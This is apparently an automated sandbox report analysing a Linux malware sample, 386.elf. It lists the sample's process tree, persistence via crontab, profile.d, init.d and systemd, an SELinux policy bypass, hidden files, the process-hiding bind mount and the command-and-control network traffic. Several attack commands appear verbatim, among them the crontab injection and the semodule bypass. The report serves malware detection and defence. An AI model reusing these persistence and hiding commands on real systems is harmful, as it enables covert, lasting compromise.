Edit tour

Linux Analysis Report
386.elf

Overview

General Information

Sample name:	386.elf
Analysis ID:	1585967
MD5:	2e2c8be0fb51f7fa433e76a43a2621ba
SHA1:	52c5d7aaec88d95e6b4c4389b43b33ebd820f898
SHA256:	40b485a176314f7a8ba7a4f2d960de23724b52971cb43c9d5924e7b61451999b
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false

Signatures

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585967
Start date and time:	2025-01-08 15:37:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	386.elf
Detection:	MAL
Classification:	mal64.spre.troj.evad.linELF@0/58@4/0

Warnings

VT rate limit hit for: app.r727.ru

Runtime Messages

Command:	/tmp/386.elf
PID:	5484
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

386.elf (PID: 5484, Parent: 5409, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /tmp/386.elf

386.elf New Fork (PID: 5489, Parent: 5484)

386.elf (PID: 5489, Parent: 5484, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /tmp/386.elf

386.elf New Fork (PID: 5497, Parent: 5489)

bash (PID: 5497, Parent: 5489, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"

bash New Fork (PID: 5498, Parent: 5497)

systemctl (PID: 5498, Parent: 5497, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5502, Parent: 5497)

systemctl (PID: 5502, Parent: 5497, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service

bash New Fork (PID: 5506, Parent: 5497)

systemctl (PID: 5506, Parent: 5497, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service

bash New Fork (PID: 5507, Parent: 5497)

journalctl (PID: 5507, Parent: 5497, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

386.elf New Fork (PID: 5508, Parent: 5489)

bash (PID: 5508, Parent: 5489, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5509, Parent: 5508)

bash New Fork (PID: 5510, Parent: 5508)

bash New Fork (PID: 5511, Parent: 5508)

386.elf New Fork (PID: 5512, Parent: 5489)

bash (PID: 5512, Parent: 5489, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

386.elf New Fork (PID: 5513, Parent: 5489)

update-rc.d (PID: 5513, Parent: 5489, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults

update-rc.d New Fork (PID: 5514, Parent: 5513)

systemctl (PID: 5514, Parent: 5513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

386.elf New Fork (PID: 5520, Parent: 5489)

mount (PID: 5520, Parent: 5489, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5489

386.elf New Fork (PID: 5542, Parent: 5489)

service (PID: 5542, Parent: 5489, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5543, Parent: 5542)

basename (PID: 5543, Parent: 5542, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5544, Parent: 5542)

basename (PID: 5544, Parent: 5542, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5545, Parent: 5542)

systemctl (PID: 5545, Parent: 5542, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5546, Parent: 5542)

service New Fork (PID: 5547, Parent: 5546)

systemctl (PID: 5547, Parent: 5546, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5548, Parent: 5546)

sed (PID: 5548, Parent: 5546, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5542, Parent: 5489, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

386.elf New Fork (PID: 5572, Parent: 5489)

systemctl (PID: 5572, Parent: 5489, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5500, Parent: 5499)

snapd-env-generator (PID: 5500, Parent: 5499, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5504, Parent: 5503)

snapd-env-generator (PID: 5504, Parent: 5503, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5518, Parent: 5517)

snapd-env-generator (PID: 5518, Parent: 5517, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5530, Parent: 803)

dumpe2fs (PID: 5530, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5561, Parent: 1)

cron (PID: 5561, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5578, Parent: 5561)

cron New Fork (PID: 5585, Parent: 5578)

sh (PID: 5585, Parent: 5578, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5586, Parent: 5585)

.mod (PID: 5586, Parent: 5585, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5587, Parent: 5586)

libgdi.so.0.8.2 (PID: 5587, Parent: 5586, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5591, Parent: 5587)

libgdi.so.0.8.2 (PID: 5591, Parent: 5587, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5616, Parent: 1)

cron (PID: 5616, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5667, Parent: 5616)

cron New Fork (PID: 5678, Parent: 5667)

sh (PID: 5678, Parent: 5667, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5679, Parent: 5678)

.mod (PID: 5679, Parent: 5678, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5684, Parent: 5679)

libgdi.so.0.8.2 (PID: 5684, Parent: 5679, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5688, Parent: 5684)

libgdi.so.0.8.2 (PID: 5688, Parent: 5684, MD5: 2e2c8be0fb51f7fa433e76a43a2621ba) Arguments: /usr/lib/libgdi.so.0.8.2

cron New Fork (PID: 5673, Parent: 5616)

cron New Fork (PID: 5677, Parent: 5673)

sh (PID: 5677, Parent: 5673, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"

systemd New Fork (PID: 5693, Parent: 1)

cron (PID: 5693, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for sample

Source: 386.elf

Joe Sandbox ML: detected

Source: global traffic

TCP traffic: 192.168.2.14:50448 -> 186.2.171.38:2070

Source: /tmp/386.elf (PID: 5489)

Reads hosts file: /etc/hosts

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: app.r727.ru

Source: 386.elf	String found in binary or memory: http://.css
Source: 386.elf	String found in binary or memory: http://.jpg
Source: 386.elf	String found in binary or memory: http://html4/loose.dtd

Source: unknown

Network traffic detected: HTTP traffic on port 46540 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal64.spre.troj.evad.linELF@0/58@4/0

Source: ELF file section

Submission: 386.elf

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/386.elf (PID: 5489)	File: /etc/profile.d/bash.cfg.sh			Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 5513)	File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5513)	File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5513)	File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5513)	File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5512)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/386.elf (PID: 5489)

File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Source: /tmp/386.elf (PID: 5489)	File: /etc/.ffff4444	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /etc/.cfg	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /etc/.cfg	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5586)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5591)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5591)	File: /etc/.cfg	Jump to behavior
Source: /.mod (PID: 5679)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5688)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5688)	File: /etc/.cfg	Jump to behavior

Source: /usr/lib/libgdi.so.0.8.2 (PID: 5688)

Empty hidden file: /etc/.ffff4444

Jump to behavior

Source: /tmp/386.elf (PID: 5497)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/386.elf (PID: 5508)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/386.elf (PID: 5512)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5585)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5678)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5677)	Shell command executed: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"	Jump to behavior

Source: /bin/bash (PID: 5498)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5502)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.service	Jump to behavior
Source: /bin/bash (PID: 5506)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.service	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5514)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/service (PID: 5542)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5545)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5547)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/386.elf (PID: 5572)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/386.elf (PID: 5489)	File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/386.elf (PID: 5489)	File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4	Jump to dropped file

Source: /tmp/386.elf (PID: 5489)	Shell script file created: /etc/profile.d/bash.cfg.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5548)

Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/386.elf (PID: 5489)	File: /etc/init.d/dns-udp4	Jump to dropped file

Source: /usr/sbin/cron (PID: 5561)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5616)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5693)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/386.elf (PID: 5489)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5497)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5508)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5512)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5586)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5679)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
386.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/binfmt-support	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cron	0%	ReversingLabs
/etc/init.d/cryptdisks	0%	ReversingLabs
/etc/init.d/cryptdisks-early	0%	ReversingLabs
